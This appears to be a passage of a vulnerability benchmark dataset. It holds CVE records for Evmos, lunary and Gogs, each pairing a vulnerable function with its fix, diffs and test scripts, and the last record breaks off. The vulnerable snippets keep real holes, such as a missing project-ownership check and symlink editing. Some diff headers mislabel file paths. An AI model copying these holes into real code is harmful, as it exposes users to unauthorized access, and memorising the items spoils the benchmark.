channeltypes.NewErrorAcknowledgement(err.Error())\n\t}\n\n\t// return the original success acknowledgement\n\treturn ack\n}"}], "fix_func": [{"id": "fix_go_69_1", "commit": "2887025", "file_path": "x/claims/keeper/ibc_callbacks.go", "start_line": 3, "end_line": 14, "snippet": "import (\n\t\"strings\"\n\n\tsdk \"github.com/cosmos/cosmos-sdk/types\"\n\tsdkerrors \"github.com/cosmos/cosmos-sdk/types/errors\"\n\ttransfertypes \"github.com/cosmos/ibc-go/v3/modules/apps/transfer/types\"\n\tchanneltypes \"github.com/cosmos/ibc-go/v3/modules/core/04-channel/types\"\n\t\"github.com/cosmos/ibc-go/v3/modules/core/exported\"\n\n\tevmos \"github.com/tharsis/evmos/v2/types\"\n\t\"github.com/tharsis/evmos/v2/x/claims/types\"\n)"}, {"id": "fix_go_69_2", "commit": "2887025", "file_path": "x/claims/keeper/ibc_callbacks.go", "start_line": 18, "end_line": 138, "snippet": "func (k Keeper) OnRecvPacket(\n\tctx sdk.Context,\n\tpacket channeltypes.Packet,\n\tack exported.Acknowledgement,\n) exported.Acknowledgement {\n\tparams := k.GetParams(ctx)\n\n\t// short (no-op) circuit by returning original ACK in case the claim is not active\n\tif !params.IsClaimsActive(ctx.BlockTime()) {\n\t\treturn ack\n\t}\n\n\t// unmarshal packet data to obtain the sender and recipient\n\tvar data transfertypes.FungibleTokenPacketData\n\tif err := transfertypes.ModuleCdc.UnmarshalJSON(packet.GetData(), &data); err != nil {\n\t\terr = sdkerrors.Wrapf(sdkerrors.ErrUnknownRequest, \"cannot unmarshal ICS-20 transfer packet data\")\n\t\treturn channeltypes.NewErrorAcknowledgement(err.Error())\n\t}\n\n\t// validate the sender bech32 address from the counterparty chain\n\tbech32Prefix := strings.Split(data.Sender, \"1\")[0]\n\tif bech32Prefix == data.Sender {\n\t\treturn channeltypes.NewErrorAcknowledgement(\n\t\t\tsdkerrors.Wrapf(sdkerrors.ErrInvalidAddress, \"invalid sender: %s\", data.Sender).Error(),\n\t\t)\n\t}\n\n\tsenderBz, err := sdk.GetFromBech32(data.Sender, bech32Prefix)\n\tif err != nil {\n\t\treturn channeltypes.NewErrorAcknowledgement(\n\t\t\tsdkerrors.Wrapf(sdkerrors.ErrInvalidAddress, \"invalid sender %s, %s\", data.Sender, err.Error()).Error(),\n\t\t)\n\t}\n\n\t// change the bech32 human readable prefix (HRP) of the sender to `evmos1`\n\tsender := sdk.AccAddress(senderBz)\n\n\t// obtain the evmos recipient address\n\trecipient, err := sdk.AccAddressFromBech32(data.Receiver)\n\tif err != nil {\n\t\treturn channeltypes.NewErrorAcknowledgement(\n\t\t\tsdkerrors.Wrapf(sdkerrors.ErrInvalidAddress, \"invalid receiver address %s\", err.Error()).Error(),\n\t\t)\n\t}\n\n\tsenderClaimsRecord, senderRecordFound := k.GetClaimsRecord(ctx, sender)\n\n\t// NOTE: we know that the connected chains from the authorized IBC channels\n\t// don't support ethereum keys (i.e `ethsecp256k1`). Thus, so we return an error,\n\t// unless the destination channel from a connection to a chain that is EVM-compatible\n\t// or supports ethereum keys (eg: Cronos, Injective).\n\tif sender.Equals(recipient) && !params.IsEVMChannel(packet.DestinationChannel) {\n\t\tswitch {\n\t\t// case 1: secp256k1 key from sender/recipient has no claimed actions -> error ACK to prevent funds from getting stuck\n\t\tcase senderRecordFound && !senderClaimsRecord.HasClaimedAny():\n\t\t\treturn channeltypes.NewErrorAcknowledgement(\n\t\t\t\tsdkerrors.Wrapf(\n\t\t\t\t\tevmos.ErrKeyTypeNotSupported, \"receiver address %s is not a valid ethereum address\", data.Receiver,\n\t\t\t\t).Error(),\n\t\t\t)\n\t\tdefault:\n\t\t\t// case 2: sender/recipient has funds stuck -> error acknowledgement to prevent more transferred tokens from\n\t\t\t// getting stuck while we implement IBC withdrawals\n\t\t\treturn channeltypes.NewErrorAcknowledgement(\n\t\t\t\tsdkerrors.Wrapf(\n\t\t\t\t\tevmos.ErrKeyTypeNotSupported,\n\t\t\t\t\t\"reverted transfer to unsupported address %s to prevent more funds from getting stuck\",\n\t\t\t\t\tdata.Receiver,\n\t\t\t\t).Error(),\n\t\t\t)\n\t\t}\n\t}\n\n\t// return original ACK in case the destination channel is not authorized\n\tif !params.IsAuthorizedChannel(packet.DestinationChannel) {\n\t\treturn ack\n\t}\n\n\trecipientClaimsRecord, recipientRecordFound := k.GetClaimsRecord(ctx, recipient)\n\n\t// handle the 4 cases for the recipient and sender claim records\n\n\tswitch {\n\tcase senderRecordFound && recipientRecordFound:\n\t\t// 1. Both sender and recipient have a claims record\n\t\t// Merge sender's record with the recipient's record and\n\t\t// claim actions that have been completed by one or the other\n\t\trecipientClaimsRecord, err = k.MergeClaimsRecords(ctx, recipient, senderClaimsRecord, recipientClaimsRecord, params)\n\t\tif err != nil {\n\t\t\treturn channeltypes.NewErrorAcknowledgement(err.Error())\n\t\t}\n\n\t\t// update the recipient's record with the new merged one, while deleting the\n\t\t// sender's record\n\t\tk.SetClaimsRecord(ctx, recipient, recipientClaimsRecord)\n\t\tk.DeleteClaimsRecord(ctx, sender)\n\tcase senderRecordFound && !recipientRecordFound:\n\t\t// 2. Only the sender has a claims record.\n\t\t// Migrate the sender record to the recipient address\n\t\tk.SetClaimsRecord(ctx, recipient, senderClaimsRecord)\n\t\tk.DeleteClaimsRecord(ctx, sender)\n\n\t\t// claim IBC action\n\t\t_, err = k.ClaimCoinsForAction(ctx, recipient, senderClaimsRecord, types.ActionIBCTransfer, params)\n\tcase !senderRecordFound && recipientRecordFound:\n\t\t// 3. Only the recipient has a claims record.\n\t\t// Only claim IBC transfer action\n\t\t_, err = k.ClaimCoinsForAction(ctx, recipient, recipientClaimsRecord, types.ActionIBCTransfer, params)\n\tcase !senderRecordFound && !recipientRecordFound:\n\t\t// 4. Neither the sender or recipient have a claims record.\n\t\t// Perform a no-op by returning the original success acknowledgement\n\t\treturn ack\n\t}\n\n\tif err != nil {\n\t\treturn channeltypes.NewErrorAcknowledgement(err.Error())\n\t}\n\n\t// return the original success acknowledgement\n\treturn ack\n}"}, {"id": "fix_go_69_3", "commit": "2887025", "file_path": "types/errors.go", "start_line": 1, "end_line": 18, "snippet": "package types\n\nimport (\n\tsdkerrors \"github.com/cosmos/cosmos-sdk/types/errors\"\n)\n\n// RootCodespace is the codespace for all errors defined in this package\nconst RootCodespace = \"evmos\"\n\n// root error codes for Evmos\nconst (\n\tcodeKeyTypeNotSupported = iota + 2\n)\n\n// errors\nvar (\n\tErrKeyTypeNotSupported = sdkerrors.Register(RootCodespace, codeKeyTypeNotSupported, \"key type 'secp256k1' not supported\")\n)"}, {"id": "fix_go_69_4", "commit": "2887025", "file_path": "x/claims/types/claim_record.go", "start_line": 62, "end_line": 69, "snippet": "func (cr ClaimsRecord) HasClaimedAny() bool {\n\tfor _, completed := range cr.ActionsCompleted {\n\t\tif completed {\n\t\t\treturn true\n\t\t}\n\t}\n\treturn false\n}"}], "vul_patch": "--- a/x/claims/keeper/ibc_callbacks.go\n+++ b/x/claims/keeper/ibc_callbacks.go\n@@ -5,7 +5,7 @@\n ) exported.Acknowledgement {\n \tparams := k.GetParams(ctx)\n \n-\t// short circuit in case claim is not active (no-op)\n+\t// short (no-op) circuit by returning original ACK in case the claim is not active\n \tif !params.IsClaimsActive(ctx.BlockTime()) {\n \t\treturn ack\n \t}\n@@ -44,6 +44,38 @@\n \t}\n \n \tsenderClaimsRecord, senderRecordFound := k.GetClaimsRecord(ctx, sender)\n+\n+\t// NOTE: we know that the connected chains from the authorized IBC channels\n+\t// don't support ethereum keys (i.e `ethsecp256k1`). Thus, so we return an error,\n+\t// unless the destination channel from a connection to a chain that is EVM-compatible\n+\t// or supports ethereum keys (eg: Cronos, Injective).\n+\tif sender.Equals(recipient) && !params.IsEVMChannel(packet.DestinationChannel) {\n+\t\tswitch {\n+\t\t// case 1: secp256k1 key from sender/recipient has no claimed actions -> error ACK to prevent funds from getting stuck\n+\t\tcase senderRecordFound && !senderClaimsRecord.HasClaimedAny():\n+\t\t\treturn channeltypes.NewErrorAcknowledgement(\n+\t\t\t\tsdkerrors.Wrapf(\n+\t\t\t\t\tevmos.ErrKeyTypeNotSupported, \"receiver address %s is not a valid ethereum address\", data.Receiver,\n+\t\t\t\t).Error(),\n+\t\t\t)\n+\t\tdefault:\n+\t\t\t// case 2: sender/recipient has funds stuck -> error acknowledgement to prevent more transferred tokens from\n+\t\t\t// getting stuck while we implement IBC withdrawals\n+\t\t\treturn channeltypes.NewErrorAcknowledgement(\n+\t\t\t\tsdkerrors.Wrapf(\n+\t\t\t\t\tevmos.ErrKeyTypeNotSupported,\n+\t\t\t\t\t\"reverted transfer to unsupported address %s to prevent more funds from getting stuck\",\n+\t\t\t\t\tdata.Receiver,\n+\t\t\t\t).Error(),\n+\t\t\t)\n+\t\t}\n+\t}\n+\n+\t// return original ACK in case the destination channel is not authorized\n+\tif !params.IsAuthorizedChannel(packet.DestinationChannel) {\n+\t\treturn ack\n+\t}\n+\n \trecipientClaimsRecord, recipientRecordFound := k.GetClaimsRecord(ctx, recipient)\n \n \t// handle the 4 cases for the recipient and sender claim records\n\n--- /dev/null\n+++ b/x/claims/keeper/ibc_callbacks.go\n@@ -0,0 +1,12 @@\n+import (\n+\t\"strings\"\n+\n+\tsdk \"github.com/cosmos/cosmos-sdk/types\"\n+\tsdkerrors \"github.com/cosmos/cosmos-sdk/types/errors\"\n+\ttransfertypes \"github.com/cosmos/ibc-go/v3/modules/apps/transfer/types\"\n+\tchanneltypes \"github.com/cosmos/ibc-go/v3/modules/core/04-channel/types\"\n+\t\"github.com/cosmos/ibc-go/v3/modules/core/exported\"\n+\n+\tevmos \"github.com/tharsis/evmos/v2/types\"\n+\t\"github.com/tharsis/evmos/v2/x/claims/types\"\n+)\n\n--- /dev/null\n+++ b/x/claims/keeper/ibc_callbacks.go\n@@ -0,0 +1,18 @@\n+package types\n+\n+import (\n+\tsdkerrors \"github.com/cosmos/cosmos-sdk/types/errors\"\n+)\n+\n+// RootCodespace is the codespace for all errors defined in this package\n+const RootCodespace = \"evmos\"\n+\n+// root error codes for Evmos\n+const (\n+\tcodeKeyTypeNotSupported = iota + 2\n+)\n+\n+// errors\n+var (\n+\tErrKeyTypeNotSupported = sdkerrors.Register(RootCodespace, codeKeyTypeNotSupported, \"key type 'secp256k1' not supported\")\n+)\n\n--- /dev/null\n+++ b/x/claims/keeper/ibc_callbacks.go\n@@ -0,0 +1,8 @@\n+func (cr ClaimsRecord) HasClaimedAny() bool {\n+\tfor _, completed := range cr.ActionsCompleted {\n+\t\tif completed {\n+\t\t\treturn true\n+\t\t}\n+\t}\n+\treturn false\n+}\n\n", "poc_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2022-24738:latest\n# bash /workspace/fix-run.sh\nset -e\n\ncd /workspace/evmos\ngit apply --whitespace=nowarn /workspace/test.patch /workspace/fix.patch\ncd ./x/claims/keeper && go test -timeout 30s -run ^TestKeeperTestSuite$ -testify.m ^TestReceive$ github.com/tharsis/evmos/v2/x/claims/keeper\n", "unit_test_cmd": "#!/bin/bash\n# From ghcr.io/anonymous2578-data/cve-2022-24738:latest\n# bash /workspace/unit_test.sh\nset -e\n\ncd /workspace/evmos\ngit apply --whitespace=nowarn /workspace/test.patch\ncd ./x/claims/keeper && go test -timeout 30s -run ^TestKeeperTestSuite$ -testify.m '^(TestAck|TestOnAckClaim|TestOnReceiveClaim)$' github.com/tharsis/evmos/v2/x/claims/keeper\n"} {"cve_id": "CVE-2024-1626", "cve_description": "An Insecure Direct Object Reference (IDOR) vulnerability exists in the lunary-ai/lunary repository, version 0.3.0, within the project update endpoint. The vulnerability allows authenticated users to modify the name of any project within the system without proper authorization checks, by directly referencing the project's ID in the PATCH request to the '/v1/projects/:projectId' endpoint. This issue arises because the endpoint does not verify if the provided project ID belongs to the currently authenticated user, enabling unauthorized modifications across different organizational projects.", "cwe_info": {"CWE-639": {"name": "Authorization Bypass Through User-Controlled Key", "description": "The system's authorization functionality does not prevent one user from gaining access to another user's data or record by modifying the key value identifying the data."}}, "repo": "https://github.com/lunary-ai/lunary", "patch_url": ["https://github.com/lunary-ai/lunary/commit/9eb9e526edff8bf82ae032f7a04867c8d58572bc"], "programing_language": "JavaScript", "vul_func": [{"id": "vul_js_142_1", "commit": "11cf286cfcc347b9e1a0fada8c277ab4a03a9fc0", "file_path": "packages/backend/src/api/v1/projects/index.ts", "start_line": 106, "end_line": 121, "snippet": "projects.patch(\"/:projectId\", async (ctx: Context) => {\n const { projectId } = ctx.params\n const bodySchema = z.object({\n name: z.string(),\n })\n const { name } = bodySchema.parse(ctx.request.body)\n\n await sql`\n update project\n set\n name = ${name}\n where\n id = ${projectId}\n `\n ctx.status = 200\n})"}, {"id": "vul_js_142_2", "commit": "11cf286cfcc347b9e1a0fada8c277ab4a03a9fc0", "file_path": "packages/backend/src/utils/authorization.ts", "start_line": 3, "end_line": 13, "snippet": "export async function verifyProjectAccess(projectId: string, userId: string) {\n const [{ exists: hasAccess }] = await sql`\n select exists (\n select 1 \n from project \n where org_id = (select org_id from account where id = ${userId}) \n and id = ${projectId}\n )\n `\n return hasAccess\n}"}, {"id": "vul_js_142_3", "commit": "11cf286cfcc347b9e1a0fada8c277ab4a03a9fc0", "file_path": "packages/backend/src/api/v1/projects/index.ts", "start_line": 71, "end_line": 104, "snippet": "projects.delete(\"/:projectId\", async (ctx: Context) => {\n const { projectId } = ctx.params\n const { orgId, userId } = ctx.state\n console.log(ctx.state)\n\n const hasProjectAccess = await verifyProjectAccess(projectId, userId)\n const [user] = await sql`select * from account where id = ${userId}`\n\n if (!hasProjectAccess) {\n ctx.throw(401, \"Not allowed\")\n }\n\n if (user.role !== \"admin\") {\n ctx.throw(403, \"You must be an admin to delete a project\")\n }\n\n const [{ count }] =\n await sql`select count(*)::int from project where org_id = ${orgId}`\n\n if (count > 1) {\n await sql`delete from project where id = ${projectId}`\n ctx.status = 200\n ctx.body = {}\n return\n } else {\n ctx.status = 422\n\n ctx.body = {\n error: \"Deletion Failed\",\n message: \"An organization must have at least one project.\",\n }\n return\n }\n})"}], "fix_func": [{"id": "fix_js_142_1", "commit": "9eb9e526edff8bf82ae032f7a04867c8d58572bc", "file_path": "packages/backend/src/api/v1/projects/index.ts", "start_line": 105, "end_line": 127, "snippet": "projects.patch(\"/:projectId\", async (ctx: Context) => {\n const { projectId } = ctx.params\n const { userId } = ctx.params\n\n const hasProjectAccess = await checkProjectAccess(projectId, userId)\n if (!hasProjectAccess) {\n ctx.throw(401, \"Unauthorized\")\n }\n\n const bodySchema = z.object({\n name: z.string(),\n })\n const { name } = bodySchema.parse(ctx.request.body)\n\n await sql`\n update project\n set\n name = ${name}\n where\n id = ${projectId}\n `\n ctx.status = 200\n})"}, {"id": "fix_js_142_2", "commit": "9eb9e526edff8bf82ae032f7a04867c8d58572bc", "file_path": "packages/backend/src/utils/authorization.ts", "start_line": 3, "end_line": 13, "snippet": "export async function checkProjectAccess(projectId: string, userId: string) {\n const [{ exists: hasAccess }] = await sql`\n select exists (\n select 1 \n from project \n where org_id = (select org_id from account where id = ${userId}) \n and id = ${projectId}\n )\n `\n return hasAccess\n}"}, {"id": "fix_js_142_3", "commit": "9eb9e526edff8bf82ae032f7a04867c8d58572bc", "file_path": "packages/backend/src/api/v1/projects/index.ts", "start_line": 71, "end_line": 103, "snippet": "projects.delete(\"/:projectId\", async (ctx: Context) => {\n const { projectId } = ctx.params\n const { orgId, userId } = ctx.state\n\n const hasProjectAccess = await checkProjectAccess(projectId, userId)\n const [user] = await sql`select * from account where id = ${userId}`\n\n if (!hasProjectAccess) {\n ctx.throw(401, \"Not allowed\")\n }\n\n if (user.role !== \"admin\") {\n ctx.throw(403, \"You must be an admin to delete a project\")\n }\n\n const [{ count }] =\n await sql`select count(*)::int from project where org_id = ${orgId}`\n\n if (count > 1) {\n await sql`delete from project where id = ${projectId}`\n ctx.status = 200\n ctx.body = {}\n return\n } else {\n ctx.status = 422\n\n ctx.body = {\n error: \"Deletion Failed\",\n message: \"An organization must have at least one project.\",\n }\n return\n }\n})"}], "vul_patch": "--- a/packages/backend/src/api/v1/projects/index.ts\n+++ b/packages/backend/src/api/v1/projects/index.ts\n@@ -1,5 +1,12 @@\n projects.patch(\"/:projectId\", async (ctx: Context) => {\n const { projectId } = ctx.params\n+ const { userId } = ctx.params\n+\n+ const hasProjectAccess = await checkProjectAccess(projectId, userId)\n+ if (!hasProjectAccess) {\n+ ctx.throw(401, \"Unauthorized\")\n+ }\n+\n const bodySchema = z.object({\n name: z.string(),\n })\n\n--- a/packages/backend/src/utils/authorization.ts\n+++ b/packages/backend/src/utils/authorization.ts\n@@ -1,4 +1,4 @@\n-export async function verifyProjectAccess(projectId: string, userId: string) {\n+export async function checkProjectAccess(projectId: string, userId: string) {\n const [{ exists: hasAccess }] = await sql`\n select exists (\n select 1 \n\n--- a/packages/backend/src/api/v1/projects/index.ts\n+++ b/packages/backend/src/api/v1/projects/index.ts\n@@ -1,9 +1,8 @@\n projects.delete(\"/:projectId\", async (ctx: Context) => {\n const { projectId } = ctx.params\n const { orgId, userId } = ctx.state\n- console.log(ctx.state)\n \n- const hasProjectAccess = await verifyProjectAccess(projectId, userId)\n+ const hasProjectAccess = await checkProjectAccess(projectId, userId)\n const [user] = await sql`select * from account where id = ${userId}`\n \n if (!hasProjectAccess) {\n\n", "poc_patch": null, "unit_test_cmd": null} {"cve_id": "CVE-2024-54148", "cve_description": "Gogs is an open source self-hosted Git service. A malicious user is able to commit and edit a crafted symlink file to a repository to gain SSH access to the server. The vulnerability is fixed in 0.13.1.", "cwe_info": {"CWE-73": {"name": "External Control of File Name or Path", "description": "The product allows user input to control or influence paths or file names that are used in filesystem operations."}, "CWE-22": {"name": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')", "description": "The product uses external input to construct a pathname that is intended to identify a file or directory that is located underneath a restricted parent directory, but the product does not properly neutralize special elements within the pathname that can cause the pathname to resolve to a location that is outside of the restricted directory."}}, "repo": "https://github.com/gogs/gogs", "patch_url": ["https://github.com/gogs/gogs/commit/c94baec9ca923f38c19f0c7c5af722b9ec04022a"], "programing_language": "Go", "vul_func": [{"id": "vul_go_206_1", "commit": "25a799a", "file_path": "internal/route/repo/editor.go", "start_line": 122, "end_line": 284, "snippet": "func editFilePost(c *context.Context, f form.EditRepoFile, isNewFile bool) {\n\tc.PageIs(\"Edit\")\n\tc.RequireHighlightJS()\n\tc.RequireSimpleMDE()\n\tc.Data[\"IsNewFile\"] = isNewFile\n\n\toldBranchName := c.Repo.BranchName\n\tbranchName := oldBranchName\n\toldTreePath := c.Repo.TreePath\n\tlastCommit := f.LastCommit\n\tf.LastCommit = c.Repo.Commit.ID.String()\n\n\tif f.IsNewBrnach() {\n\t\tbranchName = f.NewBranchName\n\t}\n\n\tf.TreePath = pathutil.Clean(f.TreePath)\n\ttreeNames, treePaths := getParentTreeFields(f.TreePath)\n\n\tc.Data[\"ParentTreePath\"] = path.Dir(c.Repo.TreePath)\n\tc.Data[\"TreePath\"] = f.TreePath\n\tc.Data[\"TreeNames\"] = treeNames\n\tc.Data[\"TreePaths\"] = treePaths\n\tc.Data[\"BranchLink\"] = c.Repo.RepoLink + \"/src/\" + branchName\n\tc.Data[\"FileContent\"] = f.Content\n\tc.Data[\"commit_summary\"] = f.CommitSummary\n\tc.Data[\"commit_message\"] = f.CommitMessage\n\tc.Data[\"commit_choice\"] = f.CommitChoice\n\tc.Data[\"new_branch_name\"] = branchName\n\tc.Data[\"last_commit\"] = f.LastCommit\n\tc.Data[\"MarkdownFileExts\"] = strings.Join(conf.Markdown.FileExtensions, \",\")\n\tc.Data[\"LineWrapExtensions\"] = strings.Join(conf.Repository.Editor.LineWrapExtensions, \",\")\n\tc.Data[\"PreviewableFileModes\"] = strings.Join(conf.Repository.Editor.PreviewableFileModes, \",\")\n\n\tif c.HasError() {\n\t\tc.Success(tmplEditorEdit)\n\t\treturn\n\t}\n\n\tif f.TreePath == \"\" {\n\t\tc.FormErr(\"TreePath\")\n\t\tc.RenderWithErr(c.Tr(\"repo.editor.filename_cannot_be_empty\"), tmplEditorEdit, &f)\n\t\treturn\n\t}\n\n\tif oldBranchName != branchName {\n\t\tif _, err := c.Repo.Repository.GetBranch(branchName); err == nil {\n\t\t\tc.FormErr(\"NewBranchName\")\n\t\t\tc.RenderWithErr(c.Tr(\"repo.editor.branch_already_exists\", branchName), tmplEditorEdit, &f)\n\t\t\treturn\n\t\t}\n\t}\n\n\tvar newTreePath string\n\tfor index, part := range treeNames {\n\t\tnewTreePath = path.Join(newTreePath, part)\n\t\tentry, err := c.Repo.Commit.TreeEntry(newTreePath)\n\t\tif err != nil {\n\t\t\tif gitutil.IsErrRevisionNotExist(err) {\n\t\t\t\t// Means there is no item with that name, so we're good\n\t\t\t\tbreak\n\t\t\t}\n\n\t\t\tc.Error(err, \"get tree entry\")\n\t\t\treturn\n\t\t}\n\t\tif index != len(treeNames)-1 {\n\t\t\tif !entry.IsTree() {\n\t\t\t\tc.FormErr(\"TreePath\")\n\t\t\t\tc.RenderWithErr(c.Tr(\"repo.editor.directory_is_a_file\", part), tmplEditorEdit, &f)\n\t\t\t\treturn\n\t\t\t}\n\t\t} else {\n\t\t\tif entry.IsSymlink() {\n\t\t\t\tc.FormErr(\"TreePath\")\n\t\t\t\tc.RenderWithErr(c.Tr(\"repo.editor.file_is_a_symlink\", part), tmplEditorEdit, &f)\n\t\t\t\treturn\n\t\t\t} else if entry.IsTree() {\n\t\t\t\tc.FormErr(\"TreePath\")\n\t\t\t\tc.RenderWithErr(c.Tr(\"repo.editor.filename_is_a_directory\", part), tmplEditorEdit, &f)\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\t}\n\n\tif !isNewFile {\n\t\t_, err := c.Repo.Commit.TreeEntry(oldTreePath)\n\t\tif err != nil {\n\t\t\tif gitutil.IsErrRevisionNotExist(err) {\n\t\t\t\tc.FormErr(\"TreePath\")\n\t\t\t\tc.RenderWithErr(c.Tr(\"repo.editor.file_editing_no_longer_exists\", oldTreePath), tmplEditorEdit, &f)\n\t\t\t} else {\n\t\t\t\tc.Error(err, \"get tree entry\")\n\t\t\t}\n\t\t\treturn\n\t\t}\n\t\tif lastCommit != c.Repo.CommitID {\n\t\t\tfiles, err := c.Repo.Commit.FilesChangedAfter(lastCommit)\n\t\t\tif err != nil {\n\t\t\t\tc.Error(err, \"get changed files\")\n\t\t\t\treturn\n\t\t\t}\n\n\t\t\tfor _, file := range files {\n\t\t\t\tif file == f.TreePath {\n\t\t\t\t\tc.RenderWithErr(c.Tr(\"repo.editor.file_changed_while_editing\", c.Repo.RepoLink+\"/compare/\"+lastCommit+\"...\"+c.Repo.CommitID), tmplEditorEdit, &f)\n\t\t\t\t\treturn\n\t\t\t\t}\n\t\t\t}\n\t\t}\n\t}\n\n\tif oldTreePath != f.TreePath {\n\t\t// We have a new filename (rename or completely new file) so we need to make sure it doesn't already exist, can't clobber.\n\t\tentry, err := c.Repo.Commit.TreeEntry(f.TreePath)\n\t\tif err != nil {\n\t\t\tif !gitutil.IsErrRevisionNotExist(err) {\n\t\t\t\tc.Error(err, \"get tree entry\")\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\t\tif entry != nil {\n\t\t\tc.FormErr(\"TreePath\")\n\t\t\tc.RenderWithErr(c.Tr(\"repo.editor.file_already_exists\", f.TreePath), tmplEditorEdit, &f)\n\t\t\treturn\n\t\t}\n\t}\n\n\tmessage := strings.TrimSpace(f.CommitSummary)\n\tif message == \"\" {\n\t\tif isNewFile {\n\t\t\tmessage = c.Tr(\"repo.editor.add\", f.TreePath)\n\t\t} else {\n\t\t\tmessage = c.Tr(\"repo.editor.update\", f.TreePath)\n\t\t}\n\t}\n\n\tf.CommitMessage = strings.TrimSpace(f.CommitMessage)\n\tif len(f.CommitMessage) > 0 {\n\t\tmessage += \"\\n\\n\" + f.CommitMessage\n\t}\n\n\tif err := c.Repo.Repository.UpdateRepoFile(c.User, database.UpdateRepoFileOptions{\n\t\tOldBranch: oldBranchName,\n\t\tNewBranch: branchName,\n\t\tOldTreeName: oldTreePath,\n\t\tNewTreeName: f.TreePath,\n\t\tMessage: message,\n\t\tContent: strings.ReplaceAll(f.Content, \"\\r\", \"\"),\n\t\tIsNewFile: isNewFile,\n\t}); err != nil {\n\t\tlog.Error(\"Failed to update repo file: %v\", err)\n\t\tc.FormErr(\"TreePath\")\n\t\tc.RenderWithErr(c.Tr(\"repo.editor.fail_to_update_file\", f.TreePath, errors.InternalServerError), tmplEditorEdit, &f)\n\t\treturn\n\t}\n\n\tif f.IsNewBrnach() && c.Repo.PullRequest.Allowed {\n\t\tc.Redirect(c.Repo.PullRequestURL(oldBranchName, f.NewBranchName))\n\t} else {\n\t\tc.Redirect(c.Repo.RepoLink + \"/src/\" + branchName + \"/\" + f.TreePath)\n\t}\n}"}], "fix_func": [{"id": "fix_go_206_1", "commit": "c94baec9ca923f38c19f0c7c5af722b9ec04022a", "file_path": "internal/route/repo/editor.go", "start_line": 122, "end_line": 293, "snippet": "func editFilePost(c *context.Context, f form.EditRepoFile, isNewFile bool) {\n\tc.PageIs(\"Edit\")\n\tc.RequireHighlightJS()\n\tc.RequireSimpleMDE()\n\tc.Data[\"IsNewFile\"] = isNewFile\n\n\toldBranchName := c.Repo.BranchName\n\tbranchName := oldBranchName\n\toldTreePath := c.Repo.TreePath\n\tlastCommit := f.LastCommit\n\tf.LastCommit = c.Repo.Commit.ID.String()\n\n\tif f.IsNewBrnach() {\n\t\tbranchName = f.NewBranchName\n\t}\n\n\tf.TreePath = pathutil.Clean(f.TreePath)\n\ttreeNames, treePaths := getParentTreeFields(f.TreePath)\n\n\tc.Data[\"ParentTreePath\"] = path.Dir(c.Repo.TreePath)\n\tc.Data[\"TreePath\"] = f.TreePath\n\tc.Data[\"TreeNames\"] = treeNames\n\tc.Data[\"TreePaths\"] = treePaths\n\tc.Data[\"BranchLink\"] = c.Repo.RepoLink + \"/src/\" + branchName\n\tc.Data[\"FileContent\"] = f.Content\n\tc.Data[\"commit_summary\"] = f.CommitSummary\n\tc.Data[\"commit_message\"] = f.CommitMessage\n\tc.Data[\"commit_choice\"] = f.CommitChoice\n\tc.Data[\"new_branch_name\"] = branchName\n\tc.Data[\"last_commit\"] = f.LastCommit\n\tc.Data[\"MarkdownFileExts\"] = strings.Join(conf.Markdown.FileExtensions, \",\")\n\tc.Data[\"LineWrapExtensions\"] = strings.Join(conf.Repository.Editor.LineWrapExtensions, \",\")\n\tc.Data[\"PreviewableFileModes\"] = strings.Join(conf.Repository.Editor.PreviewableFileModes, \",\")\n\n\tif c.HasError() {\n\t\tc.Success(tmplEditorEdit)\n\t\treturn\n\t}\n\n\tif f.TreePath == \"\" {\n\t\tc.FormErr(\"TreePath\")\n\t\tc.RenderWithErr(c.Tr(\"repo.editor.filename_cannot_be_empty\"), tmplEditorEdit, &f)\n\t\treturn\n\t}\n\n\tif oldBranchName != branchName {\n\t\tif _, err := c.Repo.Repository.GetBranch(branchName); err == nil {\n\t\t\tc.FormErr(\"NewBranchName\")\n\t\t\tc.RenderWithErr(c.Tr(\"repo.editor.branch_already_exists\", branchName), tmplEditorEdit, &f)\n\t\t\treturn\n\t\t}\n\t}\n\n\tvar newTreePath string\n\tfor index, part := range treeNames {\n\t\tnewTreePath = path.Join(newTreePath, part)\n\t\tentry, err := c.Repo.Commit.TreeEntry(newTreePath)\n\t\tif err != nil {\n\t\t\tif gitutil.IsErrRevisionNotExist(err) {\n\t\t\t\t// Means there is no item with that name, so we're good\n\t\t\t\tbreak\n\t\t\t}\n\n\t\t\tc.Error(err, \"get tree entry\")\n\t\t\treturn\n\t\t}\n\t\tif index != len(treeNames)-1 {\n\t\t\tif !entry.IsTree() {\n\t\t\t\tc.FormErr(\"TreePath\")\n\t\t\t\tc.RenderWithErr(c.Tr(\"repo.editor.directory_is_a_file\", part), tmplEditorEdit, &f)\n\t\t\t\treturn\n\t\t\t}\n\t\t} else {\n\t\t\t// \\ud83d\\udea8 SECURITY: Do not allow editing if the target file is a symlink.\n\t\t\tif entry.IsSymlink() {\n\t\t\t\tc.FormErr(\"TreePath\")\n\t\t\t\tc.RenderWithErr(c.Tr(\"repo.editor.file_is_a_symlink\", part), tmplEditorEdit, &f)\n\t\t\t\treturn\n\t\t\t} else if entry.IsTree() {\n\t\t\t\tc.FormErr(\"TreePath\")\n\t\t\t\tc.RenderWithErr(c.Tr(\"repo.editor.filename_is_a_directory\", part), tmplEditorEdit, &f)\n\t\t\t\treturn\n\t\t\t}\n\t\t}\n\t}\n\n\tif !isNewFile {\n\t\tentry, err := c.Repo.Commit.TreeEntry(oldTreePath)\n\t\tif err != nil {\n\t\t\tif gitutil.IsErrRevisionNotExist(err) {\n\t\t\t\tc.FormErr(\"TreePath\")\n\t\t\t\tc.RenderWithErr(c.Tr(\"repo.editor.file_editing_no_longer_exists\", oldTreePath), tmplEditorEdit, &f)\n\t\t\t} else {\n\t\t\t\tc.Error(err, \"get tree entry\")\n\t\t\t}\n\t\t\treturn\n\t\t}\n\n\t\t// \\ud83d\\udea8 SECURITY: Do not allow editing if the old file is a symlink.\n\t\tif entry.IsSymlink() {\n\t\t\tc.FormErr(\"TreePath\")\n\t\t\tc.RenderWithErr(c.Tr(\"repo.editor.file_is_a_symlink\", oldTreePath), tmplEditorEdit, &f)\n\t\t\treturn\n\t\t}\n\n\t\tif lastCommit != c.Repo.CommitID {\n\t\t\tfiles, err := c.Repo.Commit.FilesChangedAfter(lastCommit)\n\t\t\tif err != nil {\n\t\t\t\tc.Error(err, \"get changed 